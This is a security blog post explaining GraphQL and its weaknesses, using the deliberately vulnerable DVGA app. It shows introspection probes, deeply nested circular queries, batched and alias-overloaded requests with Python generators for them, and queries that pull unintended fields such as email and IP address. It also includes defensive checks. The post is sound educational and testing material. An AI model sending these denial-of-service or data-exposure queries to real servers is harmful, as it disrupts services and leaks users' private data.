The Security Puzzle of GraphQL - 1

By Shriyans Sudhi on 2nd Jul, 2024

To be clear, I don't have anything against GraphQL. The puzzle in the title comes from the fact that GraphQL is complex, and complexity is the worst enemy of security.

What is GraphQL?

GraphQL is a query language for APIs and a runtime for executing those queries. It was developed by Facebook in 2012 and released as an open-source project in 2015. GraphQL allows clients to request exactly the data they need from a server, rather than fetching fixed responses. This helps reduce the amount of data transferred over the network and enables more efficient data retrieval.

Why use GraphQL over REST API?

GraphQL lets the client specify exactly which data the API returns. This helps when a client needs a large amount of data of different types, which with a REST API would take multiple calls. REST responses also tend to include a lot of data that the client never uses. With GraphQL, the client controls what the server sends back.

Let's take a look at an example

Examples are essential to comprehensively understand technical concepts. Consider the following scenario: You are employed by a medical company and are tasked with calculating the average age of individuals diagnosed with diabetes. Although the purpose of this calculation may not be immediately apparent, let us proceed with this example for illustrative purposes.

To accomplish this, you will need to retrieve the ages of these individuals from a server. In the context of a REST API, this would involve making a request to a specific endpoint, such as /records/diabetes. This endpoint would return data in the following format:

{
    "diabetes": [{
            "name": "John Doe",
            "age": 45,
            "diabetic_since": "2021"
        },
        {
            "name": "Carlos",
            "age": 53,
            "diabetic_since": "2019"
        },
        .....
    ]
}

In this response, the name and diabetic_since parameters are not required for calculating the average age of the individuals. If GraphQL were employed instead, the response would be as follows:

{
    "data": {
        "diabetes": [{
                "age": 45
            },
            {
                "age": 53
            },
            .......
        ]
    }
}

Now, since only the age field was requested, the server returned solely the age information, omitting everything else.

What does a query look like?

Before we dive any further, we should discuss what a GraphQL query looks like. Take the two responses shown above: the first JSON (from the REST API) contained all the data, while the second contained only the ages, because that was all we asked for. The following query produces that second response:

query Diabetes {
	diabetes {
		age
	}
}

Here, the word diabetes appears twice (note the upper/lower case). The Diabetes on the first line is the operation name: a label the client chooses freely, which helps with logging and debugging but does not appear in the response. The lowercase diabetes is the field being requested, and it is this name that becomes the key in the response. If you want that key to be coffee instead, you can give the field an alias:

query Diabetes {
	coffee: diabetes {
		age
	}
}

Recall that the REST API response also included the name and diabetic_since fields. These can be requested as well if needed:

query Diabetes {
	diabetes {
		name
		age
		diabetic_since
	}
}

If you list additional fields in your request, the server includes them in the response as well. This lets each client tailor the data it retrieves to its specific requirements.
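
To tie this back to the average-age task, here is a minimal Python sketch of what a client might do with the age-only query. It only builds the JSON body that a GraphQL client would typically POST, and then averages the ages from a sample response. The sample data is made up for illustration, and no real server is contacted.

```python
import json

# The query that asks only for the age field.
QUERY = """
query Diabetes {
    diabetes {
        age
    }
}
"""


def build_payload(query: str) -> str:
    """Wrap a GraphQL query in the JSON body that is typically POSTed to the server."""
    return json.dumps({"query": query})


def average_age(response: dict) -> float:
    """Average the age field over the records in a GraphQL response."""
    ages = [record["age"] for record in response["data"]["diabetes"]]
    return sum(ages) / len(ages)


# Hypothetical response for the age-only query (sample values only).
sample_response = {"data": {"diabetes": [{"age": 45}, {"age": 53}]}}

payload = build_payload(QUERY)
print(average_age(sample_response))  # 49.0
```

With the REST endpoint, the same calculation would have to download name and diabetic_since for every record just to throw them away.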

Okay, but what's the vulnerability here?

When discussing GraphQL, the focus isn't on GraphQL itself being a vulnerability, but rather on other potential vulnerabilities that require attention. In this blog, we will address these issues systematically:

  1. Introspection enabled: This feature can provide valuable insights for hackers or penetration testers.
  2. Denial of Service (DoS): Techniques that can overwhelm a system's resources.
  3. Circular Queries: Queries that unintentionally create infinite loops.
  4. Query Batching DoS: Exploiting query batching for brute force attacks.
  5. Alias Overloading: Techniques abusing aliasing for malicious purposes.
  6. Excessive Data Exposure: Unnecessarily exposing sensitive information.
  7. Access Controls: Ensuring proper access restrictions are in place.
  8. Query-Cost Analysis: A method to detect and mitigate DoS attacks specific to GraphQL.

These topics will guide our exploration into securing applications using GraphQL effectively.

GraphQL introspection enabled

Imagine asking someone what they know about themselves and having them list everything. They reply: “I know my name, age, date of birth, place of birth, SSN, passport details, bank info (account number, which bank the account is with, bank balance, and bank password), my home address, my work address, and my social account info for Google, Meta (aka good old Facebook), X (miss you Twitter), Reddit, and Mastodon, including the account usernames/emails and their passwords, ……….”

It's surprising, but such instances do exist: GraphQL servers with introspection enabled. Introspection is a GraphQL feature that lets a client ask the server to describe its own schema, including the types, fields, and arguments it accepts, by sending what is known as an introspection query. Here's an example showcasing introspection on DVGA (Damn Vulnerable GraphQL Application):

Introspection through Postman

Or, if you use Burp Suite, it also has a built-in feature for sending an introspection query to GraphQL servers:

Introspection through Burp Suite

And last but not least, if you are a Caido enthusiast (like myself), you can utilize a workflow specifically designed for this purpose. It can be found at Caido Introspection Query Workflow. This tool is excellent for detecting whether introspection is enabled. Subsequently, you can employ other API clients like Postman for further analysis.

Postman is highly effective for GraphQL exploration and works seamlessly out of the box. Additionally, there are other tools tailored specifically for GraphQL, such as the Altair GraphQL client. However, I find that Postman is the most efficient tool for API testing.
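
If you would rather script the check than click through a tool, the idea can be sketched in a few lines of Python. This is only a rough illustration: it builds the request body for a small introspection query and decides from a response whether the server answered it. Both sample responses, including the error message, are hypothetical, and real servers word their refusals differently.

```python
import json

# A small introspection query: asks the server to list the names of all its types.
INTROSPECTION_QUERY = "query Introspection { __schema { types { name } } }"


def build_introspection_payload() -> str:
    """Return the JSON body to POST to the GraphQL endpoint."""
    return json.dumps({"query": INTROSPECTION_QUERY})


def introspection_enabled(response: dict) -> bool:
    """Return True if the response carries schema data, i.e. introspection was answered."""
    data = response.get("data") or {}
    schema = data.get("__schema")
    return bool(schema and schema.get("types"))


# Hypothetical responses, for illustration only.
enabled = {"data": {"__schema": {"types": [{"name": "Query"}, {"name": "PasteObject"}]}}}
disabled = {"errors": [{"message": "introspection is disabled"}]}

print(introspection_enabled(enabled))   # True
print(introspection_enabled(disabled))  # False
```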

Denial of Service

Circular Queries

Ever seen this?

while True:
	print("Hack the Planet!")

If so, imagine this:

You are asked to purchase ‘X’ from store ‘A’. The person at store ‘A’ tells you that ‘X’ is available at store ‘B’, so you go to store ‘B’. Now, the person at store ‘B’ tells you that ‘X’ is available at ‘A’. Imagine this cycle goes on for a long time until, at last, you get ‘X’ from either store.

In technical terms, a circular query in GraphQL can be understood as follows: GraphQL lets you write queries that specify exactly which objects and fields you wish to retrieve, including objects reached through other objects.

Now imagine that a field in one object of the schema references a second object, and a field in the second object references the first one. This creates a circular relationship between the two objects, and a query can follow it back and forth as many times as it likes.

Reading and understanding such relationships from a text file can be cumbersome and error-prone. However, if we visualize the schema, identifying circular relationships becomes much easier. The following was visualized using GraphQL Voyager:

GraphQL schema loaded in GraphQL Voyager

The above image illustrates the GraphQL schema for DVGA (Damn Vulnerable GraphQL Application). In this visualization, you can observe that under PasteObject, there is an arrow pointing to OwnerObject, and from OwnerObject, two arrows point back to PasteObject. This circular relationship can be exploited to craft a query that makes the server bounce between the two objects again and again, as deeply as the query is nested.

To create such a query, we need to identify queries that reference either PasteObject or OwnerObject. These queries are pastes, paste, and readAndBurn. Additionally, we can take an indirect approach by using the search query, which points to SearchResult, and subsequently leads to PasteObject.

query Pastes {
    pastes {
        owner {
            pastes {
                owner {
                    pastes {
                        owner {
                            pastes {
                                owner {
                                    pastes {
                                        owner {
                                            pastes {
                                                owner {
                                                    pastes {
                                                        id
                                                    }
                                                }
                                            }
                                        }
                                    }
                                }
                            }
                        }
                    }
                }
            }
        }
    }
}

query Search {
    search {
        ...on PasteObject {
            owner {
                pastes {
                    owner {
                        pastes {
                            owner {
                                pastes {
                                    owner {
                                        pastes {
                                            owner {
                                                pastes {
                                                    owner {
                                                        pastes {
                                                            owner {
                                                                id
                                                            }
                                                        }
                                                    }
                                                }
                                            }
                                        }
                                    }
                                }
                            }
                        }
                    }
                }
            }
        }
    }
}

If you send either of these requests to the server, you will notice a significant delay compared to other responses. If your DVGA installation is fresh, with the default (i.e., minimal) data, or if your computer has substantial resources, the response may still be relatively quick. However, in real-world scenarios, servers often handle vast amounts of data, and their computing resources may be limited, leading to more pronounced delays.
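
Nobody types such queries by hand for long. As a rough sketch, the nested pastes/owner query can be generated for any depth with a few lines of Python. The second function is an assumption of mine rather than anything DVGA ships: it estimates nesting depth by counting braces, which is the kind of measurement a server-side depth limit could be built on. It is deliberately crude and would miscount braces that appear inside string arguments.

```python
def build_circular_query(depth: int) -> str:
    """Build a pastes -> owner -> pastes ... query that visits pastes `depth` times."""
    if depth < 1:
        raise ValueError("depth must be at least 1")
    # Innermost selection ends on a scalar field so the query stays valid.
    body = "pastes { id }"
    for _ in range(depth - 1):
        body = f"pastes {{ owner {{ {body} }} }}"
    return f"query Pastes {{ {body} }}"


def nesting_depth(query: str) -> int:
    """Rough depth estimate: the maximum number of open braces at any point."""
    depth = max_depth = 0
    for ch in query:
        if ch == "{":
            depth += 1
            max_depth = max(max_depth, depth)
        elif ch == "}":
            depth -= 1
    return max_depth


query = build_circular_query(7)  # same shape as the Pastes query above
print(nesting_depth(query))      # 14
```

Raising the depth argument makes each request more expensive for the server, while the request itself grows by only a few bytes per level.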

Query Batching DoS

Query batching is a feature offered by many GraphQL servers that allows you to send multiple queries within a single request. An ordinary request carrying a single GraphQL query looks like this:

POST /graphql HTTP/1.1
accept: application/json
content-type: application/json
user-agent: PostmanClient/11.1.25 (AppId=21e0a631-e472-46fa-bbc4-5e04e34bf593)
Host: <host>:5013
Content-Length: 64
Connection: close

{"query": "query Introspection { __schema { types { name } } }"}

And a batched query looks like this:

POST /graphql HTTP/1.1
accept: application/json
content-type: application/json
user-agent: PostmanClient/11.1.25 (AppId=21e0a631-e472-46fa-bbc4-5e04e34bf593)
Host: <host>:5013
Content-Length: 521
Connection: close

[{"query": "query Introspection { __schema { types { name } } }"},{"query": "query Introspection { __schema { types { name } } }"},{"query": "query Introspection { __schema { types { name } } }"},{"query": "query Introspection { __schema { types { name } } }"},{"query": "query Introspection { __schema { types { name } } }"},{"query": "query Introspection { __schema { types { name } } }"},{"query": "query Introspection { __schema { types { name } } }"},{"query": "query Introspection { __schema { types { name } } }"}]

In a typical GraphQL query, the data is sent as a single object at the root level. However, with a batched query, an array of objects is sent instead. The potential issue arises when an attacker sends 500 or more queries in a single request. Processing such a large number of queries simultaneously can consume a significant amount of server resources, leading to potential performance degradation or denial of service.
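
To make the difference between the two request shapes concrete, here is a small Python sketch. It builds a batched body with an arbitrary number of copies of a query and counts how many operations a body carries. The within_batch_limit function and its default of 10 are hypothetical: they illustrate the kind of cap a server could enforce, not a setting of any particular GraphQL server.

```python
import json

QUERY = "query Introspection { __schema { types { name } } }"


def build_batch(query: str, count: int) -> str:
    """Serialize `count` copies of the same query as a JSON array (a batched body)."""
    return json.dumps([{"query": query} for _ in range(count)])


def batch_size(body: str) -> int:
    """Return how many operations a request body carries (1 if it is not batched)."""
    parsed = json.loads(body)
    return len(parsed) if isinstance(parsed, list) else 1


def within_batch_limit(body: str, max_batch: int = 10) -> bool:
    """Hypothetical server-side guard: accept at most `max_batch` operations per request."""
    return batch_size(body) <= max_batch


single = json.dumps({"query": QUERY})
attack = build_batch(QUERY, 500)

print(batch_size(single), within_batch_limit(single))  # 1 True
print(batch_size(attack), within_batch_limit(attack))  # 500 False
```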

Alias Overloading

This issue is quite similar to the previous one. Suppose you need to make a single query multiple times for different users, such as retrieving data for user IDs 1, 2, 3, 4, and 5. If the server returns the same key for all these queries, it would be challenging to distinguish which data belongs to which user. Requiring multiple requests for this purpose contradicts the fundamental principle of GraphQL, which is to retrieve only the necessary data in a single request.

This problem can be addressed using aliases. Aliases allow you to assign custom names to the data returned for a particular query, making it easier to identify the results. Here is an example demonstrating the use of aliases:

query Users {
  user1: user(id: "1") {
    name
    age
  }
  user2: user(id: "2") {
    name
    age
  }
  user3: user(id: "3") {
    name
    age
  }
  user4: user(id: "4") {
    name
    age
  }
  user5: user(id: "5") {
    name
    age
  }
}

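In this example, each user query is assigned a unique alias (e.g., user1, user2), ensuring that the data for each user is clearly identifiable in the response. The same feature can be abused: an attacker can repeat an expensive field hundreds or thousands of times under different aliases within a single query, forcing the server to resolve every copy. The effect is similar to query batching, but it works even where batching is disabled.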
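
Alias overloading boils down to generating many aliased copies of one field inside a single query, which is easy to script. The following Python sketch assumes the user(id: ...) field from the example above and simply repeats it once per ID; the figure of 1000 copies is arbitrary.

```python
from typing import Iterable


def build_aliased_query(user_ids: Iterable[int]) -> str:
    """Build one query that requests the user field once per ID, each under its own alias."""
    parts = [f'user{uid}: user(id: "{uid}") {{ name age }}' for uid in user_ids]
    return "query Users { " + " ".join(parts) + " }"


# The five-user query from the example, written on one line.
print(build_aliased_query([1, 2, 3, 4, 5]))

# An overloaded variant: a single request that makes the server resolve user 1000 times.
overloaded = build_aliased_query(range(1, 1001))
print(overloaded.count("user("))  # 1000
```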

Excessive Data Exposure

In the OWASP API Security Top 10, Excessive Data Exposure falls under API3:2023 Broken Object Property Level Authorization (BOPLA). BOPLA is a combination of excessive data exposure and mass assignment. In this context, we will focus on excessive data exposure, which occurs when an API returns more data in the response than what is displayed in the user interface or required by the application.

Consider a scenario where you visit a forum hosted on a company's subdomain, with accounts linked directly to the company's main application. Companies often collect extensive information, such as emails, phone numbers, names, addresses, Social Security numbers, credit card information, etc. Most of this information is meant to be kept private, with only specific details like names and, in some cases, emails being publicly accessible, depending on the company's business nature.

When accessing the forum, you should only see the name and username of other users. If the API response reveals additional private information, such as email addresses (which are not displayed in the UI), it constitutes excessive data exposure.

In a REST API, when you request information about a resource, the API returns all the information it has. If it is vulnerable to excessive data exposure, it will simply provide all the information available. In GraphQL, however, you need to specify which fields you want to retrieve.

To exploit this vulnerability in forum software, an attacker would need to specify sensitive parameters such as email, address, credit_card, etc., in the query.

Here’s an example of a query made to retrieve a user's post on a forum:

query Post {
    post(id: 1) {
        id
        title
        content
        owner {
            name
        }
    }
}

Now, if we wanted to get the owner's email address and the IP address of the machine from which the post was created, we could use the following query:

query Post {
    post(id: 1) {
        id
        title
        content
        ip_address
        owner {
            name
            email
        }
    }
}

With this query, we would get the IP address and the email of the user who created the post, even though the developers of the app never intended to expose them.
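
When testing for this, it helps to compare what the API returned against what the UI actually shows. Here is a minimal Python sketch of that comparison. The set of UI fields and the sample response (including the IP and email values) are made up for illustration; in a real test you would fill them in from the application under test.

```python
def collect_fields(value, prefix=""):
    """Return the set of dotted paths of all scalar fields in a nested response value."""
    if isinstance(value, dict):
        paths = set()
        for key, child in value.items():
            path = f"{prefix}.{key}" if prefix else key
            paths |= collect_fields(child, path)
        return paths
    if isinstance(value, list):
        paths = set()
        for item in value:
            paths |= collect_fields(item, prefix)
        return paths
    # Scalar leaf: the path itself is a field that was returned.
    return {prefix} if prefix else set()


def exposed_fields(response: dict, ui_fields: set) -> set:
    """Fields present in the response that the UI never displays."""
    return collect_fields(response["data"]) - ui_fields


# Hypothetical: the fields the forum UI renders for a post.
UI_FIELDS = {"post.id", "post.title", "post.content", "post.owner.name"}

# Hypothetical response to the second query above (sample values only).
sample = {"data": {"post": {
    "id": 1, "title": "Hello", "content": "First post",
    "ip_address": "203.0.113.7",
    "owner": {"name": "alice", "email": "alice@example.com"},
}}}

print(sorted(exposed_fields(sample, UI_FIELDS)))  # ['post.ip_address', 'post.owner.email']
```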


I hope that you enjoyed this article. The next part, coming soon, is a case study in which we will discuss how we found critical vulnerabilities in one of our clients' GraphQL instances using the techniques mentioned in this article.

See you next time

Peace ✌️
